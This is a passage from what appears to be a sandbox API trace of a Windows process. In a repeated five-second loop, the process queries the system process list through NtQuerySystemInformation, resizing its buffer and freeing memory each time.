Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.818] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.819] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.820] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.820] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.821] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.821] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.821] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.824] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.825] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.826] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.827] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.827] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.827] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.828] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.831] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.831] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.833] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.833] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.834] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.835] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.835] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.838] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.839] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.840] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.841] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.841] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.842] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.842] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.845] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.846] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.847] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.848] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.848] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.848] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.849] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.852] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.853] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.854] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.855] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.855] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.856] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.856] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.859] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.860] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.861] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.862] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.862] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.862] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.863] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.866] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.867] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.868] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.869] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.869] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.869] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.870] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.917] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.918] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.919] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.920] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.920] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.921] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.921] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.926] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.927] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.928] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.928] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.929] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.930] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.930] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.934] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.935] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.936] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.936] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.937] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.937] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.938] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.943] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.944] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.946] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.946] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.947] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.948] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.948] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.953] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.954] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.955] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.956] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.957] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.957] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.957] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.962] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.963] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.964] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.964] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.965] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.965] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.965] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.969] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.970] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.972] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.973] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.973] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.974] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.974] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.978] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.979] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.980] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.980] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.981] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.981] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.982] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.986] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.987] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.988] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.988] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.989] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.989] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.990] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.994] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.995] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.997] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.997] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.998] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.998] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.998] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.003] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.004] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.006] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.006] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.007] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.007] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.007] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.011] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.014] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.015] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.016] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.016] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.017] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.017] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.021] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.022] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.023] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.024] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.024] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) 